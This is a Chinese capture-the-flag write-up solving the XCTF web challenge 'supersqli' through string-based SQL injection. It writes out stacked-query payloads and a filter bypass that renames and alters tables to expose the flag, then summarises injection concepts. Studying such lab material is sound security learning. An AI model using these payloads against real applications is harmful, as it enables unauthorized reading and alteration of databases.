攻防世界web新手第五题supersqli

这是题目，题目看起来像是sql注入的题，先试一下最常规的，输入1，回显正常

输入1‘，显示错误

尝试加上注释符号#或者–+或者%23（注释掉后面语句，使1后面的单引号与前面的单引号成功匹配就不会报错）页面回显正常，那么闭合符号就是单引号。
输入1#

正常回显，可以得出结论注入类型为字符型，构造?inject=1’ --+

证实了闭合方式为单引号，接下来判断列数，构造：1’ order by 2 --+

正常回显，再构造1’ order by 3 --+

显示没有第三列，得出结论，只有两列

再尝试联合查询，构造1’ union select 1,2 --+

显示被过滤，说明不能用select获取，那只能尝试堆叠注入：
构造1’; show databases; --+

得到数据库的信息，看到了supersqli，再查表的信息，构造1’; show tables; --+
得到
再查列名
构造1’; show columns from words;–+

没有关键信息
用其他表试下：
构造1’;use supersqli;show columns from 1919810931114514;–+

得到flag信息，由于select被过滤，无法直接查询，所以又要考虑绕过方式了
考虑用rename改变表名，通过上面我们可以知道，回显的表是words表，因为当我们提交1的时候回显的是words表中的内容，

所以现在需要把表1919810931114514改名为words并增加相应字段，把words改为其他名字
构造：1’;rename tables words to words1;rename tables 1919810931114514 to words; alter table words change flag id varchar(100);–+
修改完成后，再注入
构造1’ or 1=1#

得到flag

总结：主要考查SQL注入，以及绕过筛选的能力

知识点：1.SQL注入的原理是后台会获取页面传过去的变量，从数据库里查询数据，当我们页面传入SQL语句时，后台会将SQL语句带入执行，导致不该被查询的数据反馈到页面。
2.–是注释符号，–后面的语句不会再执行
3.SQL语句一般会以’结尾
4.order by 是将查到的数据按降序或者升序排列，后面跟数字就是按照对应的字段查询数据，如果报错，说明没有这一列
5.SQL联合查询（UNION）是用于从一个或多个表中检索数据的高级特性。通过联合查询，我们可以将多个SELECT语句的结果组合成一个查询结果集并返回给用户。但是，请注意，为了联接，每个查询都必须具有相同的列数和数据类型。可以用来测试是否进行了关键字过滤
6.show databases：显示所有数据库
7.show columns：显示所有字段
8.rename:RENAME命令
RENAME命令用于修改表的名称，命令格式：rename table 原表名 to 新表名;